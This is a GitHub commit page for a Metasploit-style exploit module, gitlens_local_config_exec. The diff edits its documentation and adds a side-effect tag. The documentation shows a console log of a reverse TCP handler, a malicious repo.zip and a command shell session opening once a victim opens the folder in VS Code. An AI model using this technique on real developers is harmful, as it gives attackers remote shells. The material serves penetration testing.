Skip to content

Commit

Permalink
gitlens review
Browse files Browse the repository at this point in the history
  • Loading branch information
h00die committed Apr 17, 2024
1 parent ee891ec commit bae1a2e
Show file tree
Hide file tree
Showing 2 changed files with 2 additions and 2 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -48,12 +48,12 @@ msf6 exploit(multi/fileformat/gitlens_local_config_exec) > exploit
[*] Started reverse TCP handler on 192.168.10.147:4444
[+] repo.zip stored at /root/.msf4/local/repo.zip
[*] Waiting for shell
[*] Sending stage (336 bytes) to 192.168.10.100
```

Unzip the repo, open the folder in Visual Studio Code. When prompted, select "No, I don't trust the authors". Open the `README.md` file and put the cursor on the first line.

```
[*] Sending stage (336 bytes) to 192.168.10.100
[*] Command shell session 1 opened (192.168.10.147:4444 -> 192.168.10.100:62807) at 2024-03-19 17:46:46 +0000
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -67,7 +67,7 @@ def initialize(info = {})
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [SCREEN_EFFECTS] # windows fetch payloads pops up a CMD window for a second, then goes away
'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # windows fetch payloads pops up a CMD window for a second, then goes away
},
'Privileged' => false,
'DisclosureDate' => '2023-11-14'
Expand Down

0 comments on commit bae1a2e

Please sign in to comment.